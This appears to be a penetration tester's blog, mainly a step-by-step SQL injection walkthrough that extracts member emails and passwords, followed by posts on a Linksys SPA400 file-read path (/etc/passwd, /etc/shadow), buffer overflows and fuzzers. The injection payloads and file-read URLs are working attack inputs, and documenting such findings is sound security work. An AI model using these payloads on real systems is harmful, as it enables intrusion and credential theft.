The infamous Blind SQL Injection vulnerability; regarded by some as the most difficult web application vulnerability to exploit. Recently while performing a web application penetration test on a closed source application I discovered a Blind SQL Injection vulnerability and was able to exploit this vulnerability to compromise the whole web application. Below is the process I used.

1. Discovering the vulnerability.
Try and make the query return true with the use of more characters than allowed:

Request : file.asp?id=1'"
Response: System error (Failed to execute query)

Request : file.asp?id=1' OR '1'='1
Response: Query returned true (page loaded)

Note: Remember to try talking marks if quotes are not breaking the query.

2. Attempt to determine what the query is doing. Do you think it will be possible to return data or just execute a query? It may be difficult to determine at this point. However if it is only possible to execute queries your best chance is updating or inserting a new entry. The below principles can be used to achieve this.

3. Column counting
In order to construct a valid UNION query you need to know how many columns to select. There are a number of methods to achieve this. I find using the ORDER BY clauses to be most efficient. ORDER BY can take integers to select a column to order by:

Request: file.asp?id=1' ORDER BY 1 --
Response: Query returned true (page loaded)

Request: file.asp?id=1' ORDER BY 2 --
Response: Query returned true (page loaded)

Request: file.asp?id=1' ORDER BY 3 --
Response: System error.

Since the final response resulted in "System error" meaning that the query failed we were able to determine the number of columns selected: 2 (number of requests that returned true).

4. Constructing a valid UNION query
Before being able to execute a valid UNION query we need to determine the datatypes of the columns being selected. If a column is of INT datatype and you try to UNION SELECT with a VARCHAR datatype the query will fail. I was able to achieve this by selecting "null", or "0" as my column names in a UNION query:

Request: file.asp?id=1' UNION SELECT null, null --
Response: Query returned true (page loaded)

Request: file.asp?id=1' UNION SELECT @@version, null --
Response: System Error

Request: file.asp?id=1' UNION SELECT null, @@version --
Response: Query returned true (SQL Server version information returned)

Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
Copyright (c) 1988-2000 Microsoft Corporation
Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

In conclusion I was able to determine that the first column being selected is a datatype other than char (or similar). The second column was determined to be a datatype similar (if not the same) to that of the column being selected.

5. Finding SQL server information
Now that I was able to construct a valid UNION query I wanted to return other information. I started by selecting the server name from master..sysservers:

Request : file.asp?id=1' UNION SELECT null, srvname FROM master..sysservers --
Response: Query returned true (Server name returned)

Following this I selected a username from master..sysusers:
Request : file.asp?id=1' UNION SELECT null, user FROM master..sysusers --
Response: Query returned true (Database username returned)

6. Enumerating columns and tables
The below queries are pretty straight forward. Firstly I select all tables followed by selecting all columns for a specific table.

All tables:
Request : file.asp?id=1' UNION SELECT null, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --
Response: Query returned true (All table names returned)

All columns for "tbl_MemberDetails":
Request : file.asp?id=1' UNION SELECT null, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_MemberDetails' --
Response: Query returned true (All column names for specified table returned)

7. Retrieving an account
Now that I had determined the table and columns I wanted to select I was able to construct the below queries. "email" is the username field followed by "password" being the password field.

All email addresses:
Request : file.asp?id=1' UNION SELECT null, email FROM tbl_MemberDetails --
Response: Query returned true (All email addresses returned)
 
All passwords:
Request : file.asp?id=1' UNION SELECT null, password FROM tbl_MemberDetails --
Response: Query returned true (All passwords returned)
 
Password for a specific user:
Request : file.asp?id=1' UNION SELECT null, password FROM tbl_MemberDetails WHERE email='administrator@AAAAA.com
Response: Query returned true (Specific password returned)

In closing I was able to obtain a number of user accounts. Previous to this I had never exploited a Blind SQL Injection vulnerability. The whole process took about an hour to complete.

Later this month I plan on releasing a basic shellcode encoder I wrote to assist in eliminating null bytes (and others) from shellcode. Its nothing compared to metasploit however recently I went through a phase of learning to write win32 shellcode! While writing the shellcode I attempted to eliminate null bytes I knew would occur. Although unfortunately my shellcode was not null byte free. So instead of adding extra operations to eliminate my nulls bytes I wrote an encoder/decoder.

When I release the peices of shellcode I wrote I will release a version with null bytes that uses a decoder, and a version without. I plan on releasing them this month...

Been really busy of late. Started a new job as a penetration tester. Began development on a few new apps and thought about doing stuff I will never actually get around to doing. If only i never became tired.

FreeSSHd is an application I've been playing with for some time. The vulnerabilities I'd discovered I'd never actually been able to exploit. Recently I decided to spend more time on the issues. Well that time spent was time put to good use. I managed to exploit the vulnerability, all of which can be viewed in the advisory titled "FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit".

Whilst setting up IP Phones early January I came across an issue with the Linksys SPA400 device:

Manufacturer	Linksys (Division of Cisco Systems)
Device	SPA400 (Internet Telephony Gateway)
Fireware	1.1.2.2

Provided the user is logged in, it is possible to read local files as the root user. The setup.cgi script fails to verify the the requested data before preforming the action. Examples are shown below:

/html/setup.cgi?next_file=/etc/passwd
/html/setup.cgi?next_file=/etc/shadow
/html/setup.cgi?next_file=/var/system.conf

Anyway, soon I hope to find much more time soon to do more vulnerability R&D and write more blog entries!

My latest advisory exploits a buffer overflow vulnerability in CoolPlayer. The vulnerability occurs when the "PlaylistSkin" variable is set to 1534 characters, or 1538 including EIP. Besides a couple security vulnerabilities CoolPlayer is a pretty cool app!

I've recently created version 2 of both formatfuzz, and packetfuzz fuzzers which are currently private. FormatFuzz assisted in the discovery of BadAllocation vulnerabilities in Liferea RSS Reader (1.2.2), and RealPlayer (10.0.9.809 [gold]). PacketFuzz detected a stack overflow vulnerability in a Linksys WAG54G Wireless ADSL Router.

The BadAlloc error in Liferea occurs when a "title" tag contains around 5000 characters. The vulnerability is triggered when the user attempts to remove the subscription. In regard to RealPlayer, when the application receives a "favorite" with an overly long string the application crashes.
Proof of concept: liferea-badalloc.pl (Liferea)
Proof of concept: realplay-badalloc.pl (RealPlayer)

The stack overflow vulnerability in the Linksys WAG54G router occurs when the HTTPd service receives an overly long GET, or POST request. Approximately 10240 characters. However this vulnerability has been reported in various other Linksys products, yet the vulnerability in the WAG54G has not been reported.
Proof of concept: wag54g-DoS.phps

I've been hesitant about posting the errors in liferea, realplay, and wag54g for various reasons. So i doubt I'll release an advisory for the above three. Only CoolPlayer. The others are just something fun to play with!

Just now as I was searching my vulnerability stockpile I found a file I had on FreeSSHd. It listed more vulnerable functions I'd discovered in the software. Basically every SFTP operation in the software is vulnerable to a buffer overflow! After JB's first FreeSSHd post I discontinued my research on the vulnerabilities.

Anyway Christmas (Thursday) is not very far away now - I'm definitely looking forward to having some time to relax.

Tonight I'll be releasing a multi-format fuzzer I wrote codenamed "TagFuzz". This fuzzer edits tag information of a supported file, then executes the target application supplying the file as an argument.

Supported file formats include: MP3, M4A, M4P, MP4, M4B, 3GP, OGG and FLAC.

TagFuzz also features the ability to spawn the target application as child, wait five seconds, then kill the thread. No more manual pid killing!

kit:/home/r0ut3r/tagfuzz # perl tagfuzz.pl -t realplay -f hittinhard.mp3
[!] Fuzzing process beginning [Target: realplay, File: hittinhard.mp3]
[+] Stage 0 [album]: ofnm

Note that the output "ofnm" refers to the pattern class recently completed. o = Overflow, f = FMTStrings, n = Numbers, m = MiscBugs.

Download: http://www.bmgsec.com.au/download/4/

I'm yet to have the time to search for bugs using this fuzzer.

Over the coming weeks, or months I'll be releasing more of my private fuzzers. These include my SSH Fuzzer (which discovered vulnerabilities in FreeSSHd, and GoodTech SSH Server), SMTP Fuzzer, FormatFuzz (which discovered vulnerabilities in Intellitamper and W3C Amaya Web Browser), and more...

In regard to W3C Amaya, have a look at the registers after an overflow of the URL bar...

EAX 00000000
ECX 00000000
EDX 00000695
EBX 0013FD0C ASCII "AAAAAAAA..." <-- Before
ESP 0013F900 ASCII "CCCCCCCC..." <-- After my RET
EBP 00000007
ESI 0000939F
EDI 000091CD
EIP 42424242

Perfect conditions. It was a pitty there were some byte conversions which caused problems when injecting opcode though. Similar events occur with the "id" property overflow as well.

During the creation of my website I decided to incorporate Google Adsense. All the research and application's I write I give away for free. Hopefully over time I will earn some money to help fund my research!

I've just released (available for download) implementations of the A5/1 encryption cipher. This is the encryption algorithm that is used in Telstra GSM mobile phones to encrypt traffic.

Quoted from the wiki page (http://en.wikipedia.org/wiki/A5/1):

A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified.

I've written two implementations which are very much the same:

1. PHP Version
2. C# Version

Originally the PHP version was developed from a small script i created to demonstrate how the registers were to function. This later developed into a full implementation. At the time I required a C# version, so i re-wrote it.

I'm 85% of the way through creating software to manage blog entries. The software specification:

    * Post blog entries, and create blog entries
    * Blog entries can be created using TinyMCE (WYSIWYG) editor
    * Blog entries will be grouped by months, years

Eventually it will be available for download